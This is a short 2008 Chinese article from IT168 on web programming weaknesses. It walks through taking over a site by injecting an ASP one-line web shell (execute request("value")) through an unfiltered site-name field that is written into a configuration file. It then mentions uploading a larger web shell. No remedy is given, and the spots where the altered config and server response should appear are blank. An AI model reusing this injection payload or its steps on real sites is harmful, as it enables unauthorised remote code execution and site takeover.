Web网站程序编写中的安全软肋
作者: 陆羽, 出处:IT168, 责任编辑: 韩博颖,
2008-01-31 10:29
一个纯静态的网页,不知道后台,也不知道FTP帐号密码等信息,但是它还是被人拿下了,这又是为什么呢?

因为他并没有对写入的参数进行任何的过滤,所以我们可以手工写入参数,对语句进行提前结束,然后得到一个一句话后门。我们这里修改网站名称好了,改为:测试"%><%execute request("value")%><%a="1,发现修改后的配置文件内容变为:

访问setup.asp返回

证明构造一句话木马成功,接下来就是上传大马,这里就不详细演示了.
- 本文关键词:

